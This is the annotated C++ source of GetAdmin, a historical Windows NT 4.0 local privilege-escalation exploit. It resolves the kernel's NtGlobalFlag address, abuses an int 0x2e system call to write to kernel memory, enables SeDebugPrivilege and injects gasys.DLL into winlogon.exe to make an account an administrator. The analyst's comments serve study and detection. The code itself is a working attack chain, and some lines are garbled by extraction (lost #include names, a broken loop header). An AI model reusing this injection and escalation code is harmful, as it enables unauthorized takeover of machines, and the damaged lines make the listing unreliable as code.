/*
 * GetAdmin.cpp -- historical (Windows NT 4.0 era) local privilege-escalation
 * tool, kept here for analysis. What the visible code does:
 *   1. GetNtGlobalFlagPtr() maps ntoskrnl.exe from the system directory and
 *      resolves the address of the kernel's exported NtGlobalFlag variable.
 *   2. ChangeNtGlobalFlag() issues system service 0x3 through int 0x2e with a
 *      caller-built argument block whose second slot is redirected to that
 *      kernel address; the write depended on a kernel defect that Microsoft
 *      closed by hotfix shortly after the tool appeared.
 *   3. main() enables SeDebugPrivilege, finds winlogon.exe, injects gasys.DLL
 *      into it (InjectLib/UnInjectLib come from InjLib.h) and unloads it
 *      500 ms later; judging by the final message, the DLL is expected to
 *      grant `Account` administrator rights (its source is not on this page).
 * Defender's view: the observable artefacts are a user process opening
 * winlogon.exe with PROCESS_ALL_ACCESS, a read of the system directory's
 * ntoskrnl.exe by a non-system process, and gasys.DLL appearing in
 * winlogon's module list -- all visible to process-access auditing and
 * image-load telemetry.
 * Extraction note: the header names of the first #include lines were lost
 * when this listing was captured; the tokens are kept exactly as found.
 */
#include#include #include #include #include "InjLib.h"

// Implemented elsewhere (not on this page): resolves a process id from an
// image name; main() uses it to find winlogon.exe.
DWORD PsGetProcessIdFromModuleName(LPCTSTR szName);

#define PROCESSID_LOGON 32                   // not referenced in this file
#define PROCESS_MODNAMELOGON "winlogon.exe"  // image name of the target process

char Account[255]; // account to elevate: argv[1] or the current user name (see main)

//////////////////////////////////////////////////////////////
// Hard-coded NT 4.0 SP3 location of NtGlobalFlag. Not used by the code
// below, which resolves the address from ntoskrnl.exe's export table
// instead.
#define NTOSKRNL_BASE 0x80100000
#define NTGLOBALFLAG_RELPTR 0x0007bc4c // sp3
// pNtGlobalGlag = NTOSKRNL_BASE + NTGLOBALFLAG_RELPTR
// Using the two constants above instead of the function below would remove
// the need for read access to ntoskrnl.exe.

/*
 * Resolve the kernel virtual address of ntoskrnl.exe's exported NtGlobalFlag.
 *
 * Maps the on-disk ntoskrnl.exe read-only, walks its export directory with
 * the Imagehlp helpers (ImageNtHeader / ImageDirectoryEntryToData /
 * ImageRvaToVa) and returns OptionalHeader.ImageBase + RVA of the export.
 * That equals the live kernel address only while the kernel is loaded at its
 * preferred ImageBase (compare NTOSKRNL_BASE above).
 *
 * Returns 0 if the file cannot be opened or the export is not found.
 *
 * Review notes: hFileMap, mod_base, nt_headers and export_data are used
 * unchecked, so a failed CreateFileMapping or MapViewOfFile dereferences
 * NULL and leaks hFile; file_len is computed but never used; the export-name
 * lookup adds the RVA to mod_base directly while the three table lookups go
 * through ImageRvaToVa, which is only equivalent where RVA == file offset.
 */
DWORD GetNtGlobalFlagPtr()
{
    PIMAGE_NT_HEADERS nt_headers;
    PIMAGE_EXPORT_DIRECTORY export_data;
    DWORD export_data_size;
    PDWORD FunctionsNames,FunctionsPtrs;
    PWORD NameOrdinals;
    HANDLE hFile,hFileMap;
    DWORD file_len;
    PVOID mod_base,func_ptr=0,image_base;
    char file_path[MAX_PATH];
    char * func_name;
    DWORD i;

    // Build "<system dir>\ntoskrnl.exe"; neither call is length-checked.
    GetSystemDirectory(file_path,sizeof(file_path));
    strcat(file_path,"\\ntoskrnl.exe");

    hFile = CreateFile( file_path, // pointer to name of the file
        GENERIC_READ, // access (read-write) mode
        0, // share mode
        0, // pointer to security descriptor
        OPEN_EXISTING, // how to create
        0, // file attributes
        0// handle to file with attributes to copy
        );
    if(hFile == INVALID_HANDLE_VALUE) return 0;

    file_len = GetFileSize(hFile,0); // unused below

    hFileMap = CreateFileMapping( hFile, // handle to file to map
        0, // optional security attributes
        PAGE_READONLY, // protection for mapping object
        0, // high-order 32 bits of object size
        0, // low-order 32 bits of object size
        0// name of file-mapping object
        );
    // Raw file mapping (not SEC_IMAGE): RVAs must be translated with
    // ImageRvaToVa before being dereferenced.
    mod_base = MapViewOfFile( hFileMap, // file-mapping object to map into address space
        FILE_MAP_READ, // access mode
        0, // high-order 32 bits of file offset
        0, // low-order 32 bits of file offset
        0// number of bytes to map
        );

    nt_headers = ImageNtHeader(mod_base);           // NULL mod_base is not handled
    image_base = (PVOID)nt_headers->OptionalHeader.ImageBase; // preferred load address
    export_data = (PIMAGE_EXPORT_DIRECTORY) ImageDirectoryEntryToData( mod_base, FALSE, IMAGE_DIRECTORY_ENTRY_EXPORT, &export_data_size );

    // Export directory tables: names, function RVAs, and the name->function ordinal map.
    FunctionsNames = (PDWORD)ImageRvaToVa( nt_headers, mod_base, (DWORD)export_data->AddressOfNames, 0);
    FunctionsPtrs = (PDWORD)ImageRvaToVa( nt_headers, mod_base, (DWORD)export_data->AddressOfFunctions, 0);
    NameOrdinals = (PWORD)ImageRvaToVa( nt_headers, mod_base, (DWORD)export_data->AddressOfNameOrdinals, 0);

    // Extraction damage: the comparison operator and the `export_data->`
    // qualifier were dropped from this loop header. Note that the names
    // table has NumberOfNames entries, so bounding on NumberOfFunctions is
    // itself questionable.
    for(i=0;i NumberOfFunctions;i++)
    {
        // Inconsistent with the lookups above: the name RVA is added to
        // mod_base without ImageRvaToVa translation.
        func_name = (PCHAR)(FunctionsNames[i]+(DWORD)mod_base);
        if(!strcmp(func_name,"NtGlobalFlag"))
        {
            func_ptr = (PVOID)FunctionsPtrs[NameOrdinals[i]]; // RVA of the variable
        }
    }

    UnmapViewOfFile(mod_base);
    CloseHandle(hFileMap);
    CloseHandle(hFile);

    if(!func_ptr) return 0;
    return (DWORD)image_base+(DWORD)func_ptr;
}

/*
 * Attempt to set a byte of the kernel's NtGlobalFlag from user mode.
 *
 * pNtGlobalFlag: kernel address from GetNtGlobalFlagPtr(); 0 -> returns FALSE.
 *
 * On x86 NT 4.0, int 0x2e enters the kernel with eax = system service number
 * and edx = pointer to the caller's argument block, which the kernel copies
 * into the service's parameters. Here service 0x3 is invoked up to 0x100
 * times with stack[0] = a user string and stack[1] = an output pointer. The
 * output pointer first targets the local `handle`; once the value written
 * there has a nonzero bit in 0xf00, stack[1] is redirected to
 * pNtGlobalFlag+1 (byte 1 of the flag word) so the next service call writes
 * into kernel memory. Presumably that kernel did not validate the output
 * pointer as a user-mode address -- the defect the subsequent hotfix closed.
 * Which flag bit this sets and what it disables cannot be recovered from
 * this file; confirm against contemporary analysis before documenting.
 *
 * Review notes: the loop exit compares stack[1] with a value this function
 * itself stored, so it breaks on the first iteration after the redirect
 * regardless of whether the kernel write happened; the function therefore
 * returns TRUE without evidence of success. `mov edx, stack` is dead code,
 * overwritten by the following lea.
 */
BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)
{
    DWORD callnumber = 0x3;   // system service number passed in eax
    DWORD stack[32] ;         // argument block passed via edx
    int i;
    DWORD handle=0;           // initial output target for the service
    CHAR string[255];

    if(!pNtGlobalFlag) return 0;

    stack[0] = (DWORD)string;
    stack[1] = (DWORD)&handle;//pNtGlobalFlag;

    for(i=0;i<0x100;i++)
    {
        sprintf(string,"NT now cracking... pass %d",i);

        // Redirect the output pointer into kernel memory once `handle`
        // carries a nonzero value in bits 0xf00.
        if(handle & 0xf00){
            stack[1] = (DWORD)pNtGlobalFlag+1;
        }

        // NT 4.0 x86 system-service gate; `;` starts a comment in MASM syntax.
        __asm{
            mov eax, callnumber;
            mov edx, stack;
            lea edx,dword ptr [stack]
            int 0x2e;
        }

        // Checks user memory this function wrote itself -- see review notes.
        if( stack[1] == pNtGlobalFlag+1) break;
    }

    return TRUE;
}

/*
 * Enable one named privilege (e.g. SE_DEBUG_NAME) on the current process token.
 *
 * privilege: privilege name constant understood by LookupPrivilegeValue.
 * Returns the AdjustTokenPrivileges result.
 *
 * Review notes: OpenProcessToken and LookupPrivilegeValue are unchecked, so
 * hToken and the LUID may be invalid on failure; hToken is never closed;
 * AdjustTokenPrivileges returns nonzero even when the privilege was not
 * assigned (GetLastError then reports ERROR_NOT_ALL_ASSIGNED), so main()'s
 * "insufficient rights" test on this return value is unreliable.
 */
BOOL AdjustPrivileges(LPCTSTR privilege)
{
    HANDLE hToken;          // current process token
    TOKEN_PRIVILEGES tkp;   // single-privilege adjustment request
    BOOL fResult;           // AdjustTokenPrivileges result

    // Open the current process token with rights to query and adjust privileges.
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) ;

    // Translate the privilege name into its LUID.
    LookupPrivilegeValue(NULL, privilege, &tkp.Privileges[0].Luid);

    tkp.PrivilegeCount = 1; // one privilege to set
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Enable the requested privilege on this process.
    fResult = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0);
    return fResult;
}

HINSTANCE hInst; // never assigned in this file: NULL makes GetModuleFileName return this executable's path
HWND hWnd;       // unused on this page
BOOL CALLBACK MyDlgProc( HWND hwndDlg, UINT uMsg,WPARAM wPara, LPARAM lParam ); // declared only; no definition or use here

// Prototypes; the definitions below return int rather than BOOL (same
// underlying type on Win32, but inconsistent).
BOOL AttachToProcess(DWORD ProcessId);
BOOL DetachFromProcess(DWORD ProcessId);

/*
 * Entry point: elevate `Account` (argv[1], else the current user name).
 * Steps: patch NtGlobalFlag, enable SeDebugPrivilege, find winlogon.exe,
 * inject gasys.DLL for 500 ms, then unload it. Returns 0 on the happy path,
 * -1 when privilege adjustment or the winlogon lookup fails.
 *
 * Review notes: strcpy(Account, argv[1]) is an unbounded copy into a
 * 255-byte buffer; GetUserName's result is unchecked; ProcessId is a DWORD,
 * so `<= 0` only catches 0; the 500 ms Sleep races whatever the injected
 * DLL does; DetachFromProcess's result is ignored; the success message is
 * printed on injection success, not on a verified group change.
 */
int main(int argc,char** argv)
{
    DWORD AccountMaxLength = 255; // matches sizeof(Account)
    DWORD ProcessId;

    // argv[argc] is NULL, so argv[1] is NULL when no argument was given.
    if(!argv[1]) GetUserName(Account,&AccountMaxLength );
    else strcpy(Account,argv[1]);

    ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); // result ignored

    int ret = AdjustPrivileges(SE_DEBUG_NAME);
    // ret = AdjustPrivileges(SE_PROF_SINGLE_PROCESS_NAME);
    // ret = AdjustPrivileges(SE_SYSTEM_PROFILE_NAME);
    // ret = AdjustPrivileges(SE_TCB_NAME);
    if(!ret){
        printf("Adjust privileges failed! Insufficient rights. \n");
        return(-1);
    }

    ProcessId = PsGetProcessIdFromModuleName(PROCESS_MODNAMELOGON);
    if(ProcessId <=0)
    {
        printf("Can't determine winlogon process id. \n");
        return(-1);
    }

    ret = AttachToProcess(ProcessId );
    Sleep(500); // time given to the injected DLL before it is unloaded
    DetachFromProcess(ProcessId );

    if(ret)
    {
        printf("Congratulations , now account %s have administrator rights!",Account);
    }
    return(0);
}

/*
 * Open the target process and inject gasys.DLL (located next to this
 * executable) with InjectLib(). dwProcessId 0 means the current process.
 * Returns TRUE on success, FALSE if the process cannot be opened or the
 * injection fails; hProcess is closed on every path after a successful open.
 *
 * Review notes: PROCESS_ALL_ACCESS is requested although the commented-out
 * mask lists the rights the injection actually needs -- the broad request
 * is also what object-access auditing on winlogon.exe would record; the
 * magic 5 is ERROR_ACCESS_DENIED; GetModuleFileName takes its size in
 * TCHARs, so sizeof(szLibFile) is only correct for a non-Unicode build;
 * _tcsrchr is not NULL-checked before the +1.
 */
int AttachToProcess(DWORD dwProcessId )
{
    HANDLE hProcess;

    if (dwProcessId == 0) {
        dwProcessId = GetCurrentProcessId();
    }

    hProcess = OpenProcess(PROCESS_ALL_ACCESS,//PROCESS_QUERY_INFORMATION|PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION,
        FALSE, dwProcessId);
    if (hProcess == NULL) {
        // 5 == ERROR_ACCESS_DENIED
        (GetLastError() == 5)? printf(__TEXT("Insufficient access rights.\n")) :printf(__TEXT("Invalid process Id\n"));
        return FALSE;
    }
    else {
        TCHAR szLibFile[MAX_PATH];

        // Replace this executable's file name with gasys.DLL in the same directory.
        GetModuleFileName(hInst, szLibFile, sizeof(szLibFile));
        _tcscpy(_tcsrchr(szLibFile, __TEXT('\\')) + 1, __TEXT("gasys.DLL"));

        if(InjectLib(hProcess, szLibFile) ){
            // printf(__TEXT("Attach operation completed successfully.\n"));
            CloseHandle(hProcess);
        }
        else{
            printf( __TEXT("Attach operation failed!\n"));
            CloseHandle(hProcess);
            return FALSE;
        }
    }
    return TRUE;
}

/*
 * Open the target process and unload gasys.DLL from it with UnInjectLib().
 * dwProcessId 0 means the current process. Returns TRUE on success, FALSE if
 * the process cannot be opened or the unload fails.
 *
 * Same structure and review notes as AttachToProcess.
 */
int DetachFromProcess(DWORD dwProcessId )
{
    HANDLE hProcess;

    if (dwProcessId == 0) {
        dwProcessId = GetCurrentProcessId();
    }

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
    if (hProcess == NULL) {
        // 5 == ERROR_ACCESS_DENIED
        (GetLastError() == 5)? printf(__TEXT("Insufficient access rights.\n")) :printf(__TEXT("Invalid process Id\n"));
        return FALSE;
    }
    else {
        TCHAR szLibFile[MAX_PATH];

        // Same path construction as in AttachToProcess.
        GetModuleFileName(hInst, szLibFile, sizeof(szLibFile));
        _tcscpy(_tcsrchr(szLibFile, __TEXT('\\')) + 1, __TEXT("gasys.DLL"));

        if(UnInjectLib(hProcess ,szLibFile)){
            // printf(__TEXT("Detach operation completed successfully\n"));
            CloseHandle(hProcess);
        }
        else{
            printf(__TEXT("Detach operation failed!\n"));
            CloseHandle(hProcess);
            return FALSE;
        }
    }
    return TRUE;
}